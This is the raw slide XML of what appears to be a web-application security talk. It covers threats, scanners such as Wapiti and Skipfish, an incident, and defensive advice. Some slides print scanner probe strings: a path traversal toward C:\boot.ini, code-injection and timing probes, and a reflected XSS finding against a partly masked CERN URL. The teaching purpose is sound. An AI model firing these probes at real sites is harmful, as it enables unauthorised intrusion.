              <a:t>="C:\boot.ini"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>echo+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'+.+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'; print+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'+++'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc+buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>import+time;time.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Thread.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4000);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15551237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Wapiti – sample results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilityType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> name="Cross Site Scripting"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;vulnerabilityList&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> level="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;                  				 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://xxx.web.cern.ch/xxx/default2.php?index=&amp;quot;&amp;gt;&amp;lt;/frame&amp;gt;&amp;lt;script&amp;gt;alert('qf3p4bpva2')&amp;lt;/script&amp;gt;&amp;amp;main=experiments/documents.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index=&amp;quot;&amp;gt;&amp;lt;/frame&amp;gt;&amp;lt;script&amp;gt;alert('qf3p4bpva2')&amp;lt;/script&amp;gt;&amp;amp;main=experiments/documents.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        XSS (index)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41587758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Skipfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> – sample results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Content Placeholder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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41989" name="Picture 2" descr="E:\Local\2010.06 SWITCH\Web\movie-results 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914400"/>
            <a:ext cx="7897812" cy="5857875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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9091" name="Picture 3" descr="E:\Local\2010.06 SWITCH\Web\movie-results 3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43199" y="3140968"/>
            <a:ext cx="5889625" cy="2730500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</p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36277642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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-life-preserver-fai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44550" y="1125538"/>
            <a:ext cx="7710488" cy="5156200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7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="457052">
            <a:off x="428625" y="4710113"/>
            <a:ext cx="3678238" cy="1293812"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="me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algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security tools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that are disabled, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or impossible to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80901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Things to avoid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3744571354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Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10649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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>threats and typical attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, validate, validate (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do not trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and follow recommendations for your language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web scanning tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the Web server </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and programming platform configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15080240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7522" name="Picture 14" descr="Picture1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1975" y="966788"/>
            <a:ext cx="8081963" cy="5437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752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An incident in September 2008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Multiply 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="571500"/>
            <a:ext cx="6557963" cy="6557963"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9631"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="53000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF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2663633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7" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="87842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en-GB" dirty="0" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="7346950" y="2644776"/>
            <a:ext cx="2890837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1000" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.flickr.com/photos/calavera/65098350</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52229" name="Picture 5" descr="E:\Local\2010.06 Sec Day\securing\img\httpwww.flickr.comphotoscalavera6509835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7416" y="1052736"/>
            <a:ext cx="7855024" cy="5170201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57348" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251519" y="5301208"/>
            <a:ext cx="8744843" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Any questions?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2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Sebastian.Lopienski@cern.ch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2708325814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Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7373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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web defacement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> loss of reputation (clients, shareholders)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> fear, uncertainty and doubt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information disclosure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(lost data confidentiality)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-544513">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>e.g. business secrets, financial information, client database, medical data, government documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data loss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or lost data integrity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthorized access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> functionality of the application abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>denial of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> loss of availability or functionality (and revenue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“foot in the door” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(attacker inside the firewall)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30455450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7042" name="Picture 14" descr="Picture1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500" y="966788"/>
            <a:ext cx="8081963" cy="5437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704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An incident in September 2008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 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0013" y="4629150"/>
            <a:ext cx="5186362" cy="1585913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx2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5" name="Picture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865688" y="4306888"/>
            <a:ext cx="4137025" cy="1963737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx2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554754917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Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2238375" y="2500313"/>
            <a:ext cx="4071938" cy="2071687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEC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2238375" y="4929188"/>
            <a:ext cx="4071938" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEC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45" name="Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2238375" y="1071563"/>
            <a:ext cx="4071938" cy="1071562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEC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806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HTTP etc. – a quick reminder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 5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6405563" y="1157288"/>
            <a:ext cx="666750" cy="914400"/>
